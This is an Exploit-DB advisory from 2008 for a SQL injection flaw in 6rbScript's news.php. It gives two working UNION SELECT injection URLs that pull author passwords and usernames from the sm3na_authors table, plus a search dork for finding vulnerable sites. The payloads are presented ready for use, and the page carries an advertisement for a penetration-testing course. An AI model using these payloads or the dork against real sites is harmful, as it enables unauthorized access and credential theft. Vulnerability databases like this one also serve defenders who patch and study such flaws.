6rbScript - 'news.php' SQL Injection

EDB-ID:

5663

CVE:

N/A


Author:

Hussin X

Type:

webapps


Platform:

PHP

Date:

2008-05-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

##########################################################
#
#	6rbScript SQL Injection Vulnerability
#
#	by Hussin X
#
#	Home: www.tryag.cc/cc
#
#	darkangel_g85[at]Yahoo[DoT]com
#
#       DoRK: Powered by 6rbScript
##########################################################


##########################################################

Exploit:

PWD

http://www.xxx.com/news.php?newsid=79+union+select+1,pwd,3,4+from/**/sm3na_authors--

USER

http://www.xxx.com/news.php?newsid=79+union+select+1,aid,3,4+from/**/sm3na_authors--




###########################################################

Greetz: All IRAQI And all HACKER

###########################################################

# milw0rm.com [2008-05-21]